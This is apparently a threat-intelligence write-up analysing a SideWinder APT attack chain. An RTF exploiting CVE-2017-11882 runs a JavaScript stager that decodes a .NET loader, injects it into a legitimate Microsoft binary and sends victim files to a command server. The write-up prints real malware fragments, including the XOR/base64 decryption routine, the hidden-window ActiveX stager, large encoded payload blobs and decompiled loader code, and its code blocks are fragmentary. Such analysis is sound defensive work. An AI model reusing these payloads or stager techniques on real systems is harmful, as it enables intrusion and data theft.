<h6>The initial vector is an RTF file who use an well-know vulnerability (CVE-2017-11882) for execute a js script (1.a) form the package of OLE objects. </h6>
function EvpTXkLe(bsix){ return SJnEuQM(keeee,RDDb(bsix))}
var keeee = SJnEuQM("YjfT",RDDb("altWY2"+"hcV2xq"+"XA=="));
```
<h6>This series of functions perform the decryption of the base64 and xor by a constant encoded key (keeee), this can be merged on one single next function</h6>
```javascript
function EvpTXkLe(bytes)
{
var b,b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",result = "",r1,r2, i = 0,res = [],key ="3107161836";
for (; i <bytes.length;)
{
b = b64.indexOf(bytes.charAt(i++)) <<18|b64.indexOf(bytes.charAt(i++))<<12|(r1 =b64.indexOf(bytes.charAt(i++)))<<6|(r2 =b64.indexOf(bytes.charAt(i++)));
result += r1 === 64 ? String.fromCharCode(b >> 16) : r2 === 64 ? String.fromCharCode(b >> 16 & 255, b >> 8 & 255) : String.fromCharCode(b >> 16 & 255, b >> 8 & 255, b & 255);
<h6>The first block inside the try/catch is for initialize theposition of the window outside the display and payload to inject in the process</h6>
```javascript
var mst = null;
var FSO = null;
window.resizeTo(1, 1);
window.moveTo(-1000, -1200);
var shells = new ActiveXObject("WScript.Shell");
var so = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkDAAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAHdGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAACQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0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
```
<h6>The next block is two functions one used for write the payload at inject and the second for check the version .NET on the system</h6>
<h6>The last block contains the vulnerable legit software and a well-know loader used by Sidewinder, this run the correct version to use in .NET by an dynamicinvoke</h6>
```javascript
ver = "v2.0.50727";
try
{
FSO = new ActiveXObject("Scripting.FileSystemObject");
var fmt = new ActiveXObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter");
var al = new ActiveXObject("System.Collections.ArrayList");
var d = fmt["Deserialize_2"](mst);
al.Add(undefined);
var o = d["DynamicInvoke"](al.ToArray())["CreateInstance"]("StInstaller.Program");
var x = "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";
var y = "H4sIAAAAAAAAA+y9eXhTVRMwfu5NcrO1aZO2SQstbVnTFboALYt0hyJLoWUHS0hTGkiTkrRAZSuoIIIIiOyigIjsILIpIJsoiAqoKIsFXEBRdkRQhN/MOTdLC76+3x+/53ue73nbZu7MnDnnzJkzZ87cmzSn+8DZREIIkcLr0SNCdhL2k0H+/acGXprI9zXkPeVn0Tu5bp9FF5VZXVEVTsdwp6k8ymyy2x2VUcMsUc4qe5TVHpXTszCq3FFiSfT3VzUV2yjIJaQbJyFvL+4w293uBdI4Ss21IuSeghCB8RoZlIREARKlRDKQ4jzTmxDvlQxVUj7+SEjGCyiKf96r50J/jumVpCdh7b7DP2GQGUriB5fNIBf+X9jE8wP6KXxIBdBdfOjESsvYSrg2/UPBxoVjrdc/sIcmOl1OM+BUNxw7DvRPRR25DPhLdFpsDhD0E3WmbT18TC7rMT0N1J5UN57ISFlXQhY+TQjnLp8PY69RPFbtn34atuJJS0Lra3kjtK0ypsMkGmUAXCogVbzgUiNbDpxalRAvCA5QWnUulnCBqIOeaJoSFbbVjjXAS6hsLLTNUb+EoWld0IGgmogeYPTH5jwdqOW0fRcUCX61IfJ4Qc46aC44BOwTmlLEcuHYTkOiiWF9oaMlpBAlNMMFtZKRwQT9B8YwyxoZ1f/l9sBWGTXQTGQUJdRyRwBQcr2gj4wyBqKaeiEyCsQpofeLCxMUUPMVFG7WGfEhc0wneysM/f0UIJV8UYjFfqAYp5T1M4D1w0dGCXrB3ZI6Ti/IxWZ4udiM3NBfLQeR5B+pXSTECe3IsB2VYNTi8HVoCl7uCkLj4DqitpI7gpGW4pSEAFar8tqnNtWPHydBg+qBdIKBK4wGlA4FoHCEIdoA60ia15JauWBsyKaNcKloSw1pkuS25VOkhYVIZNQNFKR1R5IABRwP+LARRI4SQaDzeI4ub63EAZOhMmSMAFriiMB+GgGoQYXZDEei4whGWBCqBOg4Gq7NeR/RCai2qDwVco+ESjJBtdzYGC7xBt6pxqE1QSs1xcpgDWmcH9jKQ0HbzRCX+eACw5sjLvfBFT44rk8m7scrXs6EMU+AgUv1/nE6fhxiSqbLCqWhv79SkXzF3bjaUzFIymulrhbI9MOqQbI4Az8OUYmrA9jLYYQirczQP0imlWmlyT+I1QReK7Bq/rSaHKv516sGbhMk18q1QvIPsa4Y4DyL6xWWFU6KVmJwwGyqJNTmjjhEmRndOJrGEQ+4m4H2cSQwXPDB0T6ORIYrfHClD47mmGWlNRiBrh4gyBf7SRS0fY+P/wrSap/W0RiOlqgGq0xp2C5U/nH+OokxCaUcHWHQQCSjN1yp1egkD/UwrIbM1SXMNL6N+P8fNyLGkAOkwTlwfhqX5FyDaI7ijZjlYhsxq8U25iXUs5AhE6+CeJW7BeQiQ+FmKESG0s1QigyVm6ESGWo3Qy0y/MQrjiuW0BgxSUL3JIjLKbjA70pIhSMVLdAaLcAm39UGl5qxLYse4vzI/fT+aXtgVArlYuqfjjS3EyCR7rEiEO2QwCkW8fjxyG3vK98BiY4i8ZQv0cmXyHDXEbsIS2khiF3zjkwszEKFc9G7s2kAHkHrwloLETGFG2PrbZa1U7tHjx6llePe4MjBZSPzaQrWECW0MkdnFMilighMIVbCmCCQh9sNAFUzlFUFyR1d8KLg9XTwvNZtO16rEDGtPEgJdsQMS6sEQ0KRypHvNYzK0dVrSJUDNmHVRA0GsW7YslqnNnbHeNfDayOVo+d/I1Twb0ICCPX6N7NSE2qVYMOnwIZaRRA6xS0cjB8Mxp/X+vsOxt93MP7/zWD8/5vB+P/7YFCot5vQB2ni8kTNJFrNYoOjEH0yQZSRjmjVGFAcuwtcVAgKkGkDHEW43A2IYdCM89dqIGxqtBoJxKKtzAx+YAYpmKG2WVAgrBw25YGOPl4DBNINkxKQcTj6ojIdp/396FEsyRQTyUyIu37git1hXUIMx82Ta8Rynthnot6FaGAw6OHH4OoHrBocdKzd2B8NAIFe+lAoQCccgN0MxDoNIZ/4WMzDeCM0KkwIwM2Jfyg0QclBIBQc9SJkBCEuyG9UEwLF0qZPLNXRPRVbcEDXQnwEj/uwwFh6TH9EnKZVIhqIkk143IUFHrdfj7y2rnyIcQiaJoLw41ANxzM0CuvcKE0yMCektlpLQg+wfALT2jVrSATLNaVkHFzBYFpjMcYtITTUNZTQvT6Zppfe7MbdtxJTH5rgPJD4JjhGE/aa7PeY2L/kQQR0NGLsDyAKgzv/ySfxVe78B3LrLiQZ5xb13c3m2aNvGNNX7DUUc1YFTeBY5ibyg72203tRlEZNhFq5giVj/3nAgvQJA/b/lwErHx8wy/eiSWJPlsvh2PP7u8f+Eonf7h379OnesfcFjvrxscuNw3D9mRGUAPBTOCxoaWcg6OsopUYf7rUFjtpfSW3kw6Fbd5A0bohOSvfuIJm7lXhPKxC2M1C0jPKf8uVnI99K+QW+/Ezkj6AqjAQIjdNcYDHkAlLfXKBWrmQzoHDYPNIKRzmpm2I/PielT5iT1KDH5epOCuxDj7shyRzPbvtgJRPQmXwEL407HlCvJGQmvL4mhE2cyIeuyEV43WC+6flpAp1CACcFHL0XIjKf28Jojr1Sxbjley8j8bmXkfzjvYzkH+5lpAQCO97Hal3d8R6P593WUOFk2HHcjdEuzdHzz3pvIJvXhrFYIor7YZRxOKCoOeRqdI0KJLKZd4gtW3pjSnIyCWMxRUKuAMMf8ySfSahAT4W7uiS5YjHdKtzrBmoJSrZlaOuwcO+gd3uQCSQfcY1Cn/cREB02LRKM6PFZ0RPjI0VXNTrp7iyjjX13B/Rr/t01VDM4SHCLuLAmJPXxg7VyFtMqUZl4oOiCp1QLoEo9VGOgqENRKiKusbMCyoKEuDBnDUMCnQsZIne+RxEebjYEI+xSwpNUYz7Yr3ntUMiA/sV160dQ4tsg49Rtloirrt3XD2HDrbfwPAs/3G1EpY+RtUpHFc6/e92erV9dlIVtR0hfisvBG1GC1Fr1Y1FmNPagqlVAEV3uWhWkQX5xQ7R+CsiBIJXA6UvoCjlIMDVWbafmtZ2DNP9mE009m2j9DZieCrWEehCmG8lLa/sHBfxbQwH140LTOlu0z5bu77s6IHY8z5Y27qe4EOYR9ujNveb1AKFDEl8vFiwh9BERSRL5epHfRowd5nrywzkWk6rq8as5Fnue+4f2U4EqEmMNrtcSXLPAm8/VjXHrgY7BGFePLwcQjOubr/tcrh1P9ySSy9fVvyvP9B/D19XHLd8Frh1EfZD/qii/j388Vs7h2csdK92P+T7i2cv9LBTztwymt1ZC10SYIcI1BgNHFGpNI6ofjYr+goTtTXg7Iij0eI8xlm6mhpZ+EuY83/0BbSqdx3A/60ZDUjWmis/STR1R5w2MCLj5st7ozaBxHAqN9wopZKSCdRYkhXU0oV5xUygWHBPpIvQtlsZrRYkMkJBSnhzUTAlR+oRzBd4mCM3jWsjp4GDX1mtlejndLXzlICBQQUkzqol8RH+8SxHSfoeQoIyHobFg4H2YmJnK5h0MR9Rg0zjOu7e597zmwGvtw5/vghsBoRk/AWKPtJlkQgxNsntjcjwJLVODiyXWnaGz+UK/D8C9gqYoUmd/tBZdkK7JaIopCJ7DKUw7gEvK8Tzglc3wCSJPExQZ3kYtJD731ph7aKXxFq3UOVomBun4fqH0cVIz/cQXgFzRzMCuQTK5czYIaWWwIQiOqajmNIx0DSBgGxY7V9Ay/WLji6gHJj5xDXnn28BlhIaXQ4/TsfAljBma5rxzu7u0lnhum4vhXoenSY3gmIGxOAVvfnye3tYag+RsQLxzn0zMoOAumN0FYWusei3haYYE5qN5MyE9SfUnRMP24cbkq7ve57EPeM7IcgspnUdwCm0A0U+ciZkYMcZgqPUXjC+jVsZZ2GhwLH2eBbJaXEM83bYdr2Dvxtk4CZCB+AvyxRJjPHqRO/G4SmNlLCe+MRAfz/ICnF/0HR3Or/OYZ1R0mHqVcQ7O8lwAUVHgUo5X6f
var m = o.Work;
```
<h6>Finally still execute the process with loader and the code to inject by process injection if throws an exception and close the window whatever the result</h6>
###### We can note that ``` 202/KfzLXf6NisWqPtYOrrQYJfzErkCyS8ib8dz3QSsN/1115/2280/16331af8 ``` show like an internal reference for the SideWinder group, this is used as identifier in the communications with the C2 for the data sent. The path of the origin directory is encoded in base 64.
<h6>The first software is a legit wizard EFS REKEY of Microsoft know as rekeywiz.exe. This can do the certificates for the EFS, we can confirm it on the code of the software.</h6>
<h6> On the dotnet loader, we can load an instance from the code extracted by the module. This module use an xor in a loop of the bytes for get the payload to execute. </h6>
public long OffsetPosition {get{return this._offsetPosition;}}
// Token: 0x04000024 RID: 36
public readonly string _path;
// Token: 0x04000025 RID: 37
public readonly long _offsetPosition;
}
}
}
```
###### The second module, this select the good extension instead of the content to push, this use too a popular JSON framework for .NET (Newtonsoft). Once the files done, this add a queue for send files at the C2 by zip files. The origin path, type, offset of the files of the victim is push in base 64 in the X-File references in the header. The JSON files are still stored in Appdata with a folder with the identicator name ```CommonsDat``` instead of ```AuthyDat``` for the last operation against China (cf last analysis) </h6>
|Execution|Execution through Module Load<br>Exploitation for Client Execution|https://attack.mitre.org/techniques/T1129/<br>https://attack.mitre.org/techniques/T1203/|
|Persistence|Registry Run Keys / Startup Folder|https://attack.mitre.org/techniques/T1060/|
<h6> This can be exported as JSON format <ahref="https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Indian/APT/SideWinder/25-12-19/JSON/MITRE_ref.json">Export in JSON</a></h6>
<h2>Yara Rules<aname="Yara"></a></h2>
<h6> A list of YARA Rule is available <ahref="">here</a></h6>
